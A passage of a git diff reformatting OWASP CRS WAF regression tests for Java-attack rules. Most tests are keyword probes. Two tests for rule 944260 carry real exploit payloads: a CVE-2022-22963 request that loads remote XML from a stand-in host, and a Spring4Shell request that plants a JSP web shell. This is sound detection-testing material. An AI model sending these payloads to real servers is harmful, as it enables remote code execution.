\"944250\"" - - test_title: 944250-15 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.evil.processbuilder + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_id: 15 desc: "Cookie name includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.evil.processbuilder=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-16 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.evil.processbuilder=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_id: 16 desc: "Request header test includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.evil.processbuilder - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-17 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.evil.processbuilder + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_id: 17 desc: "XML attribute value includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-18 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944250\"" + - test_id: 18 desc: "XML element value includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.evil.processbuilder" - output: - log_contains: "id \"944250\"" - - test_title: 944250-19 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.evil.processbuilder" + output: + log_contains: "id \"944250\"" + - test_id: 19 desc: "Nested XML element value includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.evil.processbuilder" - output: - log_contains: "id \"944250\"" - - test_title: 944250-20 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.evil.processbuilder" + output: + log_contains: "id \"944250\"" + - test_id: 20 desc: "Content-Type text/plain includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.evil.processbuilder" - output: - log_contains: "id \"944250\"" - - test_title: 944250-21 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.evil.processbuilder" + output: + log_contains: "id \"944250\"" + - test_id: 21 desc: "Content-Type application/json arg value includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.evil.processbuilder\"}" - output: - log_contains: "id \"944250\"" - - test_title: 944250-22 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.evil.processbuilder\"}" + output: + log_contains: "id \"944250\"" + - test_id: 22 desc: "Content-Type application/json arg name includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.evil.processbuilder\": \"test\"}" - output: - log_contains: "id \"944250\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.evil.processbuilder\": \"test\"}" + output: + log_contains: "id \"944250\"" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml index 144d3f52a..82eaddb4e 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml @@ -1,41 +1,38 @@ --- meta: author: "theMiddle, azurit" - enabled: true - name: "944260.yaml" description: "Positive tests for rule 944260" +rule_id: 944260 tests: - - test_title: 944260-1 + - test_id: 1 desc: "CVE-2022-22963" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.1" - data: "_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://127.1.2.3/wb.xml')" - output: - log_contains: "id \"944260\"" - - test_title: 944260-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.1" + data: "_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://127.1.2.3/wb.xml')" + output: + log_contains: "id \"944260\"" + - test_id: 2 desc: "Spring Framework RCE" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.1" - data: "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" - output: - log_contains: "id \"944260\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.1" + data: "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" + output: + log_contains: "id \"944260\"" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml index 412a3b686..15685453b 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml @@ -1,6697 +1,6366 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944300.yaml" description: "Positive tests for rule 944300" +rule_id: 944300 tests: - - test_title: 944300-1 + - test_id: 1 desc: "Argument test includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cnVudGltZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cnVudGltZQ" + output: + log_contains: "id \"944300\"" + - test_id: 2 desc: "Argument name includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cnVudGltZQ=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cnVudGltZQ=test" + output: + log_contains: "id \"944300\"" + - test_id: 3 desc: "Cookie test includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=cnVudGltZQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cnVudGltZQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 4 desc: "Cookie name includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: cnVudGltZQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cnVudGltZQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 5 desc: "Request header test includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: cnVudGltZQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cnVudGltZQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 6 desc: "XML attribute value includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 7 desc: "XML element value includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cnVudGltZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cnVudGltZQ" + output: + log_contains: "id \"944300\"" + - test_id: 8 desc: "Nested XML element value includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cnVudGltZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cnVudGltZQ" + output: + log_contains: "id \"944300\"" + - test_id: 9 desc: "Content-Type text/plain includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cnVudGltZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cnVudGltZQ" + output: + log_contains: "id \"944300\"" + - test_id: 10 desc: "Content-Type application/json arg value includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"cnVudGltZQ\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"cnVudGltZQ\"}" + output: + log_contains: "id \"944300\"" + - test_id: 11 desc: "Content-Type application/json arg name includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"cnVudGltZQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"cnVudGltZQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 12 desc: "Argument test includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HJ1bnRpbWU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HJ1bnRpbWU" + output: + log_contains: "id \"944300\"" + - test_id: 13 desc: "Argument name includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HJ1bnRpbWU=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HJ1bnRpbWU=test" + output: + log_contains: "id \"944300\"" + - test_id: 14 desc: "Cookie test includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HJ1bnRpbWU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-15 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HJ1bnRpbWU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 15 desc: "Cookie name includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HJ1bnRpbWU=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-16 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HJ1bnRpbWU=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 16 desc: "Request header test includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HJ1bnRpbWU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - 